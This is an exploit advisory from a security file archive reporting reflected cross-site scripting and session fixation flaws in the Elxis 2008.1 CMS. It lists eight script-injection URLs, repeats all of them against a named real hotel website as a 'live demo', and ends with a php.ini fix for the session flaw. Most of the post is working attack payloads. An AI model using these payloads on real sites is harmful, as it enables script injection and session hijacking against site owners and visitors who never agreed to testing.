what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

elxis-xss.txt

elxis-xss.txt
Posted Oct 14, 2008
Authored by swappie aka faithlove

Elxis 2008.1 Nemesis suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 52e5c51e245da274ad283a3c10f4b45c4b1d8cee2ed3f31a4835edc5494f2b46

elxis-xss.txt

Change Mirror Download
################################################################ 
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
################################################################
# Greetings to --d3hydr8 -r45c4l -baltazar -sinner_01 #
# -C1c4Tr1Z -Gabitzu and all darkc0de members #
;###############################################################
#
# Author: swappie [aka] faithlove
#
# Home : www.darkc0de.com
#
# Email : swappieakafaithlove@gmail.com
#
# Do researching and share!
#
;###############################################################
#
# Title: Elxis 2008.1 Nemesis
#
# Issue Date: Monday, 29 September 2008
#
# CMS Link: http://www.elxis-downloads.com/fserver/96.html

# Vendor: http://www.elxis.org/
#
#
;###############################################################
#
# Dork: I'm sure you can figure that by yourself, right?
#
#################################################################


----------
XSS Vulns;
----------

http://www.site.com/?>'"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php/>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>

----------
Live Demo;
----------

http://www.hotelsinalbania.net/?>'"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php/>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>


;==================================================================;
;==================================================================;

-----------------
Session Fixation;
-----------------


http://www.site.com/?PHPSESSID=[session_fixation]

Explanation:

The user's session ID could be fixed by the attacker before the user
even logs on the target server so it wouldn't be needed to get the session
ID afterwards.

How to fix the "session fixation" ?

There is a simple way to do it.

Step 1.

Open the file named php.ini from your server.

Step 2.

Look through the file for the following lines:

; This option enables administrators to make their users invulnerable to
; attacks which involve passing session ids in URLs; defaults to 0.

; session.use_only_cookies = 1 !![PLEASE NOTE THE ";"]!!


Step 3.

=> [ and make it look like this: ]

; This option enables administrators to make their users invulnerable to
; attacks which involve passing session ids in URLs; defaults to 0.

session.use_only_cookies = 1

Step 4.

Restart the web server, php, whatever.



Cheers,

swappie [aka] faithlove
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close